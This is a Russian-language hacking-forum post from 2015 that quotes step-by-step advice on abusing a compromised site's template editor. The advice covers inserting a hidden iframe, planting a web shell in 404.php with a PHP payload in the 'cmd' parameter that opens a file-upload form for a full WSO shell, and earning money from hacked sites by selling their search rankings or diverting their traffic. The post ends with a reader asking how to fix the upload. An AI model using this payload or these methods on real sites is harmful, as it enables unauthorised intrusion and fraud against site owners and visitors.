Показать сообщение отдельно

Старый 02.11.2015, 01:00
Edward_CSS5
Новичок
С нами: 5880566

Цитата:

Сообщение от ZoRKeG

1) Да, ты сможешь вставить свой фрейм через шаблоны. Если код фрейма не появится на странице - может быть несколько проблем:
а) Страницы кешируются, для этого найди папку с кэшем и удали её.
б) Ты вставил код не в тот шаблон.
в) Файл шаблона не может быть отредактирован, так-как защищен от записи.
Примечание: я не рекомендую его использовать, так-как гугл и яндекс плохо реагируют на это, а так же, некоторые антивирусы могут тоже ругаться на него.

2) Да, залить шелл вполне возможно. Для этого перейди в режим редактирования шаблона, выбери любой файл шаблона, к примеру 404.php и вставь в начало кода такую строчку:

code:

Далее зайди на главную страницу сайта, посмотри исходный код страницы, в самом верху ты сможешь найти пути к файлам-стилей, скопируй путь, убери в конце лишнее, чтобы был путь в корень каталога шаблона, добавь там имя файла, который ты редактировал, в нашем случае это 404.php , дальше добавь к адресу такую строку:

code:

?cmd=print($_GET[t]);if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};exit;&t=

Все, теперь на странице появится форма загрузки, через которую ты сможешь залить полноценный шелл, к примеру: WSO 2.5

3) Если на сайте хорошие показатели Тиц и ПР - можно выжать деньги, рекомендую использовать сайты с тиц не меньше чем 100 и пр не меньше чем 1, желательно, чтобы пр был 3 и больше, но все же. Так же рекомендовано, чтобы сайт был в яндекс каталоге и DMOZ, а так же имел более 100 проиндексированных страниц в яндексе, все эти параметры повышают число $$$, которые ты с них выжмешь.
Так же можно сливать трафик с гугла и яндекса или же с других поисковых системах. Если понадобится код - могу написать под твои потребности, да и много кода там не понадобится.

Если что-то не понятно или требуется помощь - пиши, буду рад помочь.
------------------------------------------------------------------------------------------------------
UpDate:

Немного добавлю от себя, если все же нужно вставить фрейм - лучше его ещё запихнуть под невидимый блок:

Так-как на странице он будет отображаться как небольшой квадратик.

Как можно пофиксить php upload? То есть
Я понимаю тема старая, и поднимаю по пустяку, но всё-же интересно знать.